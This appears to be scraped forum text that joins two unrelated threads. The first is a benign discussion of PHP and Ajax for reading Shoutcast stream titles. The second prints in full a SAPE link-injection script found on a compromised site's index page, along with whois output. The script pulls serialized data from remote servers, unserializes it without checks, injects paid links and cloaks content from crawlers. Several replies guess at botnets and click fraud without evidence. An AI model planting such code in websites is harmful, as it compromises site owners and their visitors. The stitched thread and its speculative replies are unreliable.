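A scheduled run needs some way to tell whether the title differs from the one seen last time. One simple option is to keep the previous title in a small state file. This is a sketch only: the function name `trackChanged()` and the state-file path are assumptions, not part of the original script.

```php
<?php
// Hypothetical helper: returns true when $currentTitle differs from the title
// stored by the previous run, and records the new title in $stateFile.
function trackChanged(string $currentTitle, string $stateFile): bool
{
    $previous = is_file($stateFile) ? file_get_contents($stateFile) : null;
    if ($previous === $currentTitle) {
        return false;                    // same song as on the last run
    }
    file_put_contents($stateFile, $currentTitle, LOCK_EX);
    return true;
}

// Possible usage inside the scheduled script (path is an example):
//   $t = new streaminfo('http://64.236.34.196:80/stream/1014');
//   if ($t->valid && trackChanged((string) $t->streamtitle, '/tmp/last_track.txt')) {
//       // the song changed: update the page, database, etc.
//   }
```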
If you want to run the PHP script to keep your metadata up to date (I'm assuming you're building a website and using HTML audio tags here), you can use the ontimeupdate event with an Ajax function. If you're not, look in your audio playback documentation for something similar.
<audio src="http://ip:port/;" ontimeupdate="loadXMLDoc()">
You can find a great example here http://www.w3schools.com/php/php_ajax_php.asp
Have the PHP script echo all the relevant information at once, using one PHP variable at the very end of your script.
<?php ....
$phpVar=$streamtitle;
$phpVar2=$streamsong;
$result="I want my string to look like this: <br> {$phpVar} {$phpVar2}";
echo $result;
?>
Then use the function assigned to .onreadystatechange to modify the particular elements you want on your website by using .responseText (this will contain the same content as your PHP script's echo).
After SCOURING the web for 4 hours, this is the only Shoutcast metadata script I've found that works! Thank you.
To run this constantly, why not use a setInterval combined with jQuery's AJAX call?
<script>
$(function() {
setInterval(getTrackName,16000);
});
function getTrackName() {
$.ajax({
url: "track_name.php"
})
.done(function( data ) {
$( "#results" ).text( data );
});
}
</script>
Also, your last couple of 'echo' lines were breaking the script for me. Just put quotes around the Meta Interval text, etc.
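With quotes in place, the labels become string literals and the property values are concatenated onto them. A minimal sketch, using a made-up stand-in object instead of a real streaminfo instance so that it runs on its own; `formatTrackInfo()` is a hypothetical name.

```php
<?php
// Hypothetical helper: builds the two output lines from any object that
// exposes icymetaint and streamtitle, as the streaminfo class does.
function formatTrackInfo($info): string
{
    return 'Meta Interval: ' . $info->icymetaint . "\n"
         . 'Current Track: ' . $info->streamtitle . "\n";
}

// Stand-in values for illustration only.
$t = (object) ['icymetaint' => 16000, 'streamtitle' => 'Artist - Title'];
echo formatTrackInfo($t);
```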
I found this script attached to a modified index page. It looks like some kind of backdoor. And who is this SAPE?
<?php
class SAPE_base {
var $_version = '1.0.8';
var $_verbose = false;
var $_charset = '';
var $_sape_charset = '';
var $_server_list = array('dispenser-01.sape.ru', 'dispenser-02.sape.ru');
var $_cache_lifetime = 3600;
var $_cache_reloadtime = 600;
var $_error = '';
var $_host = '';
var $_request_uri = '';
var $_multi_site = false;
var $_fetch_remote_type = '';
var $_socket_timeout = 6;
var $_force_show_code = false;
var $_is_our_bot = false;
var $_debug = false;
var $_ignore_case = false;
var $_db_file = '';
var $_use_server_array = false;
var $_force_update_db = false;
function SAPE_base($options = null) {
$host = '';
if (is_array($options)) {
if (isset($options['host'])) {
$host = $options['host'];
}
}
elseif (strlen($options)) {
$host = $options;
$options = array();
}
else {
$options = array();
}
if (isset($options['use_server_array']) && $options['use_server_array'] == true) {
$this->_use_server_array = true;
}
if (strlen($host)) {
$this->_host = $host;
}
else {
$this->_host = $_SERVER['HTTP_HOST'];
}
$this->_host = preg_replace('/^http:\/\//', '', $this->_host);
$this->_host = preg_replace('/^www\./', '', $this->_host);
if (isset($options['request_uri']) && strlen($options['request_uri'])) {
$this->_request_uri = $options['request_uri'];
}
elseif ($this->_use_server_array === false) {
$this->_request_uri = getenv('REQUEST_URI');
}
if (strlen($this->_request_uri) == 0) {
$this->_request_uri = $_SERVER['REQUEST_URI'];
}
if (isset($options['multi_site']) && $options['multi_site'] == true) {
$this->_multi_site = true;
}
if (isset($options['debug']) && $options['debug'] == true) {
$this->_debug = true;
}
if (isset($_COOKIE['sape_cookie']) && ($_COOKIE['sape_cookie'] == _SAPE_USER)) {
$this->_is_our_bot = true;
if (isset($_COOKIE['sape_debug']) && ($_COOKIE['sape_debug'] == 1)) {
$this->_debug = true;
$this->_options = $options;
$this->_server_request_uri = $this->_request_uri = $_SERVER['REQUEST_URI'];
$this->_getenv_request_uri = getenv('REQUEST_URI');
$this->_SAPE_USER = _SAPE_USER;
}
if (isset($_COOKIE['sape_updatedb']) && ($_COOKIE['sape_updatedb'] == 1)) {
$this->_force_update_db = true;
}
}
else {
$this->_is_our_bot = false;
}
if (isset($options['verbose']) && $options['verbose'] == true || $this->_debug) {
$this->_verbose = true;
}
if (isset($options['charset']) && strlen($options['charset'])) {
$this->_charset = $options['charset'];
}
else {
$this->_charset = 'windows-1251';
}
if (isset($options['fetch_remote_type']) && strlen($options['fetch_remote_type'])) {
$this->_fetch_remote_type = $options['fetch_remote_type'];
}
if (isset($options['socket_timeout']) && is_numeric($options['socket_timeout']) && $options['socket_timeout'] > 0) {
$this->_socket_timeout = $options['socket_timeout'];
}
if (isset($options['force_show_code']) && $options['force_show_code'] == true) {
$this->_force_show_code = true;
}
if (!defined('_SAPE_USER')) {
return $this->raise_error('Не задана константа _SAPE_USER');
}
if (isset($options['ignore_case']) && $options['ignore_case'] == true) {
$this->_ignore_case = true;
$this->_request_uri = strtolower($this->_request_uri);
}
}
function fetch_remote_file($host, $path) {
$user_agent = $this->_user_agent . ' ' . $this->_version;
@ini_set('allow_url_fopen', 1);
@ini_set('default_socket_timeout', $this->_socket_timeout);
@ini_set('user_agent', $user_agent);
if (
$this->_fetch_remote_type == 'file_get_contents'
||
(
$this->_fetch_remote_type == ''
&&
function_exists('file_get_contents')
&&
ini_get('allow_url_fopen') == 1
)
) {
$this->_fetch_remote_type = 'file_get_contents';
if ($data = @file_get_contents('http://' . $host . $path)) {
return $data;
}
}
elseif (
$this->_fetch_remote_type == 'curl'
||
(
$this->_fetch_remote_type == ''
&&
function_exists('curl_init')
)
) {
$this->_fetch_remote_type = 'curl';
if ($ch = @curl_init()) {
@curl_setopt($ch, CURLOPT_URL, 'http://' . $host . $path);
@curl_setopt($ch, CURLOPT_HEADER, false);
@curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
@curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, $this->_socket_timeout);
@curl_setopt($ch, CURLOPT_USERAGENT, $user_agent);
if ($data = @curl_exec($ch)) {
return $data;
}
@curl_close($ch);
}
}
else {
$this->_fetch_remote_type = 'socket';
$buff = '';
$fp = @fsockopen($host, 80, $errno, $errstr, $this->_socket_timeout);
if ($fp) {
@fputs($fp, "GET {$path} HTTP/1.0\r\nHost: {$host}\r\n");
@fputs($fp, "User-Agent: {$user_agent}\r\n\r\n");
while (!@feof($fp)) {
$buff .= @fgets($fp, 128);
}
@fclose($fp);
$page = explode("\r\n\r\n", $buff);
return $page[1];
}
}
return $this->raise_error('Не могу подключиться к серверу: ' . $host . $path . ', type: ' . $this->_fetch_remote_type);
}
function _read($filename) {
$fp = @fopen($filename, 'rb');
@flock($fp, LOCK_SH);
if ($fp) {
clearstatcache();
$length = @filesize($filename);
$mqr = @get_magic_quotes_runtime();
@set_magic_quotes_runtime(0);
if ($length) {
$data = @fread($fp, $length);
}
else {
$data = '';
}
@set_magic_quotes_runtime($mqr);
@flock($fp, LOCK_UN);
@fclose($fp);
return $data;
}
return $this->raise_error('Не могу считать данные из файла: ' . $filename);
}
function _write($filename, $data) {
$fp = @fopen($filename, 'ab');
if ($fp) {
if (flock($fp, LOCK_EX | LOCK_NB)) {
$length = strlen($data);
ftruncate($fp, 0);
@fwrite($fp, $data, $length);
@flock($fp, LOCK_UN);
@fclose($fp);
if (md5($this->_read($filename)) != md5($data)) {
@unlink($filename);
return $this->raise_error('Нарушена целостность данных при записи в файл: ' . $filename);
}
}
else {
return false;
}
return true;
}
return $this->raise_error('Не могу записать данные в файл: ' . $filename);
}
function raise_error($e) {
$this->_error = '<p style="color: red; font-weight: bold;">SAPE ERROR: ' . $e . '</p>';
if ($this->_verbose == true) {
print $this->_error;
}
return false;
}
function load_data() {
$this->_db_file = $this->_get_db_file();
if (!is_file($this->_db_file)) {
if (@touch($this->_db_file)) {
@chmod($this->_db_file, 0666);
}
else {
return $this->raise_error('Нет файла ' . $this->_db_file . '. Создать не удалось. Выставите права 777 на папку.');
}
}
if (!is_writable($this->_db_file)) {
return $this->raise_error('Нет доступа на запись к файлу: ' . $this->_db_file . '! Выставите права 777 на папку.');
}
@clearstatcache();
$data = $this->_read($this->_db_file);
if (
$this->_force_update_db
|| (
!$this->_is_our_bot
&&
(
filemtime($this->_db_file) < (time() - $this->_cache_lifetime)
||
filesize($this->_db_file) == 0
||
@unserialize($data) == false
)
)
) {
@touch($this->_db_file, (time() - $this->_cache_lifetime + $this->_cache_reloadtime));
$path = $this->_get_dispenser_path();
if (strlen($this->_charset)) {
$path .= '&charset=' . $this->_charset;
}
foreach ($this->_server_list as $i => $server) {
if ($data = $this->fetch_remote_file($server, $path)) {
if (substr($data, 0, 12) == 'FATAL ERROR:') {
$this->raise_error($data);
}
else {
$hash = @unserialize($data);
if ($hash != false) {
$hash['__sape_charset__'] = $this->_charset;
$hash['__last_update__'] = time();
$hash['__multi_site__'] = $this->_multi_site;
$hash['__fetch_remote_type__'] = $this->_fetch_remote_type;
$hash['__ignore_case__'] = $this->_ignore_case;
$hash['__php_version__'] = phpversion();
$hash['__server_software__'] = $_SERVER['SERVER_SOFTWARE'];
$data_new = @serialize($hash);
if ($data_new) {
$data = $data_new;
}
$this->_write($this->_db_file, $data);
break;
}
}
}
}
}
if (strlen(session_id())) {
$session = session_name() . '=' . session_id();
$this->_request_uri = str_replace(array('?' . $session, '&' . $session), '', $this->_request_uri);
}
$this->set_data(@unserialize($data));
}
}
class SAPE_client extends SAPE_base {
var $_links_delimiter = '';
var $_links = array();
var $_links_page = array();
var $_user_agent = 'SAPE_Client PHP';
function SAPE_client($options = null) {
parent::SAPE_base($options);
$this->load_data();
}
function return_links($n = null, $offset = 0) {
if (is_array($this->_links_page)) {
$total_page_links = count($this->_links_page);
if (!is_numeric($n) || $n > $total_page_links) {
$n = $total_page_links;
}
$links = array();
for ($i = 1; $i <= $n; $i++) {
if ($offset > 0 && $i <= $offset) {
array_shift($this->_links_page);
}
else {
$links[] = array_shift($this->_links_page);
}
}
$html = join($this->_links_delimiter, $links);
if (
strlen($this->_charset) > 0
&&
strlen($this->_sape_charset) > 0
&&
$this->_sape_charset != $this->_charset
&&
function_exists('iconv')
) {
$new_html = @iconv($this->_sape_charset, $this->_charset, $html);
if ($new_html) {
$html = $new_html;
}
}
if ($this->_is_our_bot) {
$html = '<sape_noindex>' . $html . '</sape_noindex>';
}
}
else {
$html = $this->_links_page;
}
if ($this->_debug) {
$html .= print_r($this, true);
}
return $html;
}
function _get_db_file() {
if ($this->_multi_site) {
return dirname(__FILE__) . '/' . $this->_host . '.links.db';
}
else {
return dirname(__FILE__) . '/links.db';
}
}
function _get_dispenser_path() {
return '/code.php?user=' . _SAPE_USER . '&host=' . $this->_host;
}
function set_data($data) {
if ($this->_ignore_case) {
$this->_links = array_change_key_case($data);
}
else {
$this->_links = $data;
}
if (isset($this->_links['__sape_delimiter__'])) {
$this->_links_delimiter = $this->_links['__sape_delimiter__'];
}
if (isset($this->_links['__sape_charset__'])) {
$this->_sape_charset = $this->_links['__sape_charset__'];
}
else {
$this->_sape_charset = '';
}
if (@array_key_exists($this->_request_uri, $this->_links) && is_array($this->_links[$this->_request_uri])) {
$this->_links_page = $this->_links[$this->_request_uri];
}
else {
if (isset($this->_links['__sape_new_url__']) && strlen($this->_links['__sape_new_url__'])) {
if ($this->_is_our_bot || $this->_force_show_code) {
$this->_links_page = $this->_links['__sape_new_url__'];
}
}
}
}
}
class SAPE_context extends SAPE_base {
var $_words = array();
var $_words_page = array();
var $_user_agent = 'SAPE_Context PHP';
var $_filter_tags = array('a', 'textarea', 'select', 'script', 'style', 'label', 'noscript', 'noindex', 'button');
function SAPE_context($options = null) {
parent::SAPE_base($options);
$this->load_data();
}
function replace_in_text_segment($text) {
$debug = '';
if ($this->_debug) {
$debug .= "<!-- argument for replace_in_text_segment: \r\n" . base64_encode($text) . "\r\n -->";
}
if (count($this->_words_page) > 0) {
$source_sentence = array();
if ($this->_debug) {
$debug .= '<!-- sentences for replace: ';
}
foreach ($this->_words_page as $n => $sentence) {
//Заменяем все сущности на символы
$special_chars = array(
'&amp;' => '&',
'&quot;' => '"',
'&#039;' => '\'',
'&lt;' => '<',
'&gt;' => '>'
);
$sentence = strip_tags($sentence);
foreach ($special_chars as $from => $to) {
str_replace($from, $to, $sentence);
}
$sentence = htmlspecialchars($sentence);
$sentence = preg_quote($sentence, '/');
$replace_array = array();
if (preg_match_all('/(&[#a-zA-Z0-9]{2,6};)/isU', $sentence, $out)) {
for ($i = 0; $i < count($out[1]); $i++) {
$unspec = $special_chars[$out[1][$i]];
$real = $out[1][$i];
$replace_array[$unspec] = $real;
}
}
foreach ($replace_array as $unspec => $real) {
$sentence = str_replace($real, '((' . $real . ')|(' . $unspec . '))', $sentence);
}
$source_sentences[$n] = str_replace(' ', '((\s)|(&nbsp;))+', $sentence);
if ($this->_debug) {
$debug .= $source_sentences[$n] . "\r\n\r\n";
}
}
if ($this->_debug) {
$debug .= '-->';
}
$first_part = true;
if (count($source_sentences) > 0) {
$content = '';
$open_tags = array();
$close_tag = '';
$part = strtok(' ' . $text, '<');
while ($part !== false) {
if (preg_match('/(?si)^(\/?[a-z0-9]+)/', $part, $matches)) {
$tag_name = strtolower($matches[1]);
if (substr($tag_name, 0, 1) == '/') {
$close_tag = substr($tag_name, 1);
if ($this->_debug) {
$debug .= '<!-- close_tag: ' . $close_tag . ' -->';
}
}
else {
$close_tag = '';
if ($this->_debug) {
$debug .= '<!-- open_tag: ' . $tag_name . ' -->';
}
}
$cnt_tags = count($open_tags);
if (($cnt_tags > 0) && ($open_tags[$cnt_tags - 1] == $close_tag)) {
array_pop($open_tags);
if ($this->_debug) {
$debug .= '<!-- ' . $tag_name . ' - deleted from open_tags -->';
}
if ($cnt_tags - 1 == 0) {
if ($this->_debug) {
$debug .= '<!-- start replacement -->';
}
}
}
if (count($open_tags) == 0) {
if (!in_array($tag_name, $this->_filter_tags)) {
$split_parts = explode('>', $part, 2);
if (count($split_parts) == 2) {
foreach ($source_sentences as $n => $sentence) {
if (preg_match('/' . $sentence . '/', $split_parts[1]) == 1) {
$split_parts[1] = preg_replace('/' . $sentence . '/', str_replace('$', '\$', $this->_words_page[$n]), $split_parts[1], 1);
if ($this->_debug) {
$debug .= '<!-- ' . $sentence . ' --- ' . $this->_words_page[$n] . ' replaced -->';
}
unset($source_sentences[$n]);
unset($this->_words_page[$n]);
}
}
$part = $split_parts[0] . '>' . $split_parts[1];
unset($split_parts);
}
}
else {
$open_tags[] = $tag_name;
if ($this->_debug) {
$debug .= '<!-- ' . $tag_name . ' - added to open_tags, stop replacement -->';
}
}
}
}
else {
foreach ($source_sentences as $n => $sentence) {
if (preg_match('/' . $sentence . '/', $part) == 1) {
$part = preg_replace('/' . $sentence . '/', str_replace('$', '\$', $this->_words_page[$n]), $part, 1);
if ($this->_debug) {
$debug .= '<!-- ' . $sentence . ' --- ' . $this->_words_page[$n] . ' replaced -->';
}
unset($source_sentences[$n]);
unset($this->_words_page[$n]);
}
}
}
if ($this->_debug) {
$content .= $debug;
$debug = '';
}
if ($first_part) {
$content .= $part;
$first_part = false;
}
else {
$content .= $debug . '<' . $part;
}
unset($part);
$part = strtok('<');
}
$text = ltrim($content);
unset($content);
}
}
else {
if ($this->_debug) {
$debug .= '<!-- No word`s for page -->';
}
}
if ($this->_debug) {
$debug .= '<!-- END: work of replace_in_text_segment() -->';
}
if ($this->_is_our_bot || $this->_force_show_code || $this->_debug) {
$text = '<sape_index>' . $text . '</sape_index>';
if (isset($this->_words['__sape_new_url__']) && strlen($this->_words['__sape_new_url__'])) {
$text .= $this->_words['__sape_new_url__'];
}
}
if ($this->_debug) {
if (count($this->_words_page) > 0) {
$text .= '<!-- Not replaced: ' . "\r\n";
foreach ($this->_words_page as $n => $value) {
$text .= $value . "\r\n\r\n";
}
$text .= '-->';
}
$text .= $debug;
}
return $text;
}
function replace_in_page(&$buffer) {
if (count($this->_words_page) > 0) {
$split_content = preg_split('/(?smi)(<\/?sape_index>)/', $buffer, -1);
$cnt_parts = count($split_content);
if ($cnt_parts > 1) {
//Если есть хоть одна пара sape_index, то начинаем работу
if ($cnt_parts >= 3) {
for ($i = 1; $i < $cnt_parts; $i = $i + 2) {
$split_content[$i] = $this->replace_in_text_segment($split_content[$i]);
}
}
$buffer = implode('', $split_content);
if ($this->_debug) {
$buffer .= '<!-- Split by Sape_index cnt_parts=' . $cnt_parts . '-->';
}
}
else {
$split_content = preg_split('/(?smi)(<\/?body[^>]*>)/', $buffer, -1, PREG_SPLIT_DELIM_CAPTURE);
if (count($split_content) == 5) {
$split_content[0] = $split_content[0] . $split_content[1];
$split_content[1] = $this->replace_in_text_segment($split_content[2]);
$split_content[2] = $split_content[3] . $split_content[4];
unset($split_content[3]);
unset($split_content[4]);
$buffer = $split_content[0] . $split_content[1] . $split_content[2];
if ($this->_debug) {
$buffer .= '<!-- Split by BODY -->';
}
}
else {
if ($this->_debug) {
$buffer .= '<!-- Can`t split by BODY -->';
}
}
}
}
else {
if (!$this->_is_our_bot && !$this->_force_show_code && !$this->_debug) {
$buffer = preg_replace('/(?smi)(<\/?sape_index>)/', '', $buffer);
}
else {
if (isset($this->_words['__sape_new_url__']) && strlen($this->_words['__sape_new_url__'])) {
$buffer .= $this->_words['__sape_new_url__'];
}
}
if ($this->_debug) {
$buffer .= '<!-- No word`s for page -->';
}
}
return $buffer;
}
function _get_db_file() {
if ($this->_multi_site) {
return dirname(__FILE__) . '/' . $this->_host . '.words.db';
}
else {
return dirname(__FILE__) . '/words.db';
}
}
function _get_dispenser_path() {
return '/code_context.php?user=' . _SAPE_USER . '&host=' . $this->_host;
}
function set_data($data) {
$this->_words = $data;
if (@array_key_exists($this->_request_uri, $this->_words) && is_array($this->_words[$this->_request_uri])) {
$this->_words_page = $this->_words[$this->_request_uri];
}
}
}
?>
Sape is apparently a link exchange service used by a Russian-speaking botnet owner.
This backdoor appears to use the sape API to download XML and use bots to create a "context" that probably clicks links to generate illicit revenue.
From a bad Google translation of sape.ru:
Sape system increases revenue and reduces the consumption of
webmasters optimizers. Venues are beginning to sell the place, not
only from the main pages, but also internal. How many pages on the
site? Let each revenue. Optimizers are buying cheap internal pages and
save on moving projects.
My Russian isn't very good, but sape.ru looks like some kind of link exchange service. And in answer to your question "Who is SAPE":
[david@archtower ~]$ whois sape.ru
% By submitting a query to RIPN's Whois Service
% you agree to abide by the following terms of use:
% http://www.ripn.net/about/servpol.html#3.2 (in Russian)
% http://www.ripn.net/about/en/servpol.html#3.2 (in English).
domain: SAPE.RU
nserver: ns1.q0.ru.
nserver: ns2.q0.ru.
nserver: ns3.q0.ru.
state: REGISTERED, DELEGATED, VERIFIED
org: LTD Sape
registrar: R01-REG-RIPN
admin-contact: https://partner.r01.ru/contact_admin.khtml
created: 2006.06.20
paid-till: 2013.06.20
free-date: 2013.07.21
source: TCI
Last updated on 2012.06.19 19:28:42 MSK
[david@archtower ~]$
At first glance, it looks like something that automatically visits ad referral links.